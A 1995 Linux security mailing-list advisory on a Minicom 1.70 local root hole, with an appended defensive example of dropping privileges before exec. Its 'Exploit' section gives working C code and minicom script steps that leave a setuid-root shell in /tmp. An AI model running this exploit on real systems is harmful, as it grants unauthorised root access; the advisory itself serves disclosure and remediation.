[362] in linux-security and linux-alert archive
Minicom 1.70
daemon@ATHENA.MIT.EDU (Aleph One)
Fri Sep 15 21:08:53 1995
Date: Fri, 15 Sep 1995 13:05:09 -0500 (CDT)
From: Aleph One <aleph1@dfw.net>
To: linux-alert@tarsier.cv.nrao.edu
Reply-To: linux-security@tarsier.cv.nrao.edu
Program: Minicom 1.70.
Problem: Minicom users defined in its minicom.users file can gain root access.
Explanation: Some distributions install minicom setuid root so that it
can access callout devices (/dev/cua0, /dev/ttyS0, /dev/modem).
Minicom also allows users to create scripts that can be used
to automate logins and other tasks. These scripts are interpreted
by runscript(1). runscript(1) allows arbitrary shell escapes.
Minicom forks and execs runscript(1) without calling setreuid(2)
to drop privileges. Therefore it follows that the user can execute
arbitrary commands with the privilege of minicom.
To complicate matters even more, some distributions install the
minicom.users file with default user names. In the case of
Slackware these are: gonzo, satan, snake. If you create accounts
with these names on your system you are opening yourself to
a security breach. If you have accounts under those names you might
want to disable them until security is restored. If a user
asks you to change their username to one of those or to create an
account with one of those names DO NOT DO IT!
Exploit: Create a program that sets its real and effective uid to 0,
then executes a shell command such as copying a shell and making it
setuid root. This will do:

    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        setreuid(0, 0);                            /* keep root as real and effective uid */
        system("/bin/cp /bin/sh /tmp/mysh");       /* copy a shell ... */
        system("/bin/chmod 4777 /tmp/mysh");       /* ... and make it setuid root */
        return 0;
    }
Create a minicom script that will execute our program.
echo '! /tmp/gime' > /tmp/foo
Start minicom and type Control-A then G. Select C and enter
the name for our minicom script (/tmp/foo). Hit return and
execute the script. Exit minicom and you should find a setuid sh
named /tmp/mysh.
Solution: Upgrade to minicom 1.71. Furthermore, minicom should not be setuid root.
Minicom should be of the same group as the dialout device (normally
tty, dialout, modem, or uucp), and setgid. On a side note, many
distributions have the correct permissions on the /dev/cua devices
but not on their equivalent /dev/ttyS devices. This is the case with
Debian 0.93. To fix: chown root.dialout /dev/ttyS*; chmod o-rwx
/dev/ttyS*. Make sure that this does not break your other serial devices
such as your mouse.
Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint B6 C3 BD 8A 7A 79 03 55 CC 24 F4 01 2B BD 90 3A
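An added example (not part of the original post and not minicom's own code) of the fix the advisory calls for: a setuid helper must drop privileges permanently, and verify the drop, before forking and exec'ing an untrusted interpreter such as runscript(1), so that any shell escape in the script runs as the real user. It assumes Linux/glibc; the helper path and arguments are placeholders.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Prototype repeated here so the example builds under strict -std modes. */
int setgroups(size_t size, const gid_t *list);

/* Permanently drop to the caller's real uid/gid. Returns 0 on success.
   Order matters: supplementary groups, then gid, then uid, since once
   uid 0 is gone the process may no longer change its groups. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (geteuid() == 0 && getgroups(0, NULL) > 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setregid(rgid, rgid) != 0 || setreuid(ruid, ruid) != 0)
        return -1;
    /* Verify the drop: real == effective, and root cannot be regained
       (a saved uid of 0 left behind would let setuid(0) succeed). */
    if (geteuid() != ruid || getegid() != rgid)
        return -1;
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* Run an untrusted helper (e.g. runscript) as the real user. Returns the
   helper's exit status, or -1 if it could not be run safely. */
int run_helper_unprivileged(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* In the child: shell escapes in the script now run as the user. */
        if (drop_privileges() != 0)
            _exit(127);
        execv(path, argv);
        _exit(127);             /* exec failed; never fall back to privilege */
    }
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Run as an ordinary user the drop is a no-op that still passes the checks; run from a setuid-root binary the child loses root before the helper starts.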